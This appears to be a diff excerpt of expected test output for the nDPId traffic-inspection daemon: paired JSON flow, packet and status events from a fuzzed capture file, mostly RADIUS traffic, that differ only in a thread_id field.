00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":128,"flow_first_seen":1528996068129,"flow_last_seen":1528997833636,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":55818,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":128,"flow_first_seen":1528996068129,"flow_last_seen":1528997833636,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":55818,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997833703,"pkt":"AAAMB6xAABRP+4rqCABFAALbITKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997833703,"pkt":"AAAMB6xAABRP+4rqCABFAALbITKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997839248} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997839248}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1528997839322,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBj5AAPwRTcjG4hk1CgxAHgcVchAAkSN5C4AAiYCfkZP9IDJyM93m2y+NtRUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y2YvYjA6OWY6YmE6NGE6MGU6N2UvMjMzTw4BAAAMFwwAAAwBf\/xQEl7YRWPdxCp7KxkigG7kdUs="} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1528997839322,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBj5AAPwRTcjG4hk1CgxAHgcVchAAkSN5C4AAiYCfkZP9IDJyM93m2y+NtRUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y2YvYjA6OWY6YmE6NGE6MGU6N2UvMjMzTw4BAAAMFwwAAAwBf\/xQEl7YRWPdxCp7KxkigG7kdUs="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01233{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"AAAMB6xAVRRP+4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"AAAMB6xAVRRP+4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997839449} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997839449}
00576{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABlAADABkJAAPwRTaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABlAADABkJAAPwRTaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997839511} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997839511}
00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1528997867612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997867612,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBqNAAPsRTmPG4hk1CgxAHgcUchQAkRggC4IAiUKdIcJOOZHCxHzP96o9900BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZy4gNWIyMvo3Y2YvYjA6OWY64mE6NGE6MGU6N2UvMmgzTw4BAAAMFwwAAAwBf\/xQEmqru8HGcXlY8CXWo9RL+sk="} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1528997867612,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997867612,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBqNAAPsRTmPG4hk1CgxAHgcUchQAkRggC4IAiUKdIcJOOZHCxHzP96o9900BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZy4gNWIyMvo3Y2YvYjA6OWY64mE6NGE6MGU6N2UvMmgzTw4BAAAMFwwAAAwBf\/xQEmqru8HGcXlY8CXWo9RL+sk="}
@@ -306,12 +306,12 @@
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3}
00497{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":243,"packets-processed":199,"total-skipped-flows":0,"total-l4-data-len":85029,"total-not-detected-flows":11,"total-guessed-flows":2,"total-detected-flows":38,"total-detection-updates":0,"total-updates":10,"current-active-flows":14,"total-active-flows":54,"total-idle-flows":40,"total-events-serialized":308,"global_ts_msec":1528997988607} 00497{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":243,"packets-processed":199,"total-skipped-flows":0,"total-l4-data-len":85029,"total-not-detected-flows":11,"total-guessed-flows":2,"total-detected-flows":38,"total-detection-updates":0,"total-updates":10,"current-active-flows":14,"total-active-flows":54,"total-idle-flows":40,"total-events-serialized":308,"global_ts_msec":1528997988607}
00622{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":244,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2560,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997988607,"pkt":"ABRP+4rqcNuYVcUnCgBFAADhCANAAPwRS8fG4hk1CgxAHgcUchAAzcqaC4QAxQGJ6Lj45v3l8O9jNbsTb\/MBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0T0oBAhBIFwEAAAEFAAD7NrjaxmMHv4vIE1TL2G1wAgUAANQK+SugcQAAjldODJoz\/yqLAQACCwUAAPFizAqNmvaDbjPlWgGZGZpQEuJJeKWQmKkvyDnGACXbYRU="} 00608{"packet_event_id":1,"packet_event_name":"packet","packet_id":244,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2560,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997988607,"pkt":"ABRP+4rqcNuYVcUnCgBFAADhCANAAPwRS8fG4hk1CgxAHgcUchAAzcqaC4QAxQGJ6Lj45v3l8O9jNbsTb\/MBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0T0oBAhBIFwEAAAEFAAD7NrjaxmMHv4vIE1TL2G1wAgUAANQK+SugcQAAjldODJoz\/yqLAQACCwUAAPFizAqNmvaDbjPlWgGZGZpQEuJJeKWQmKkvyDnGACXbYRU="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":244,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2560,"global_ts_msec":1528997988838} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":244,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2560,"global_ts_msec":1528997988838}
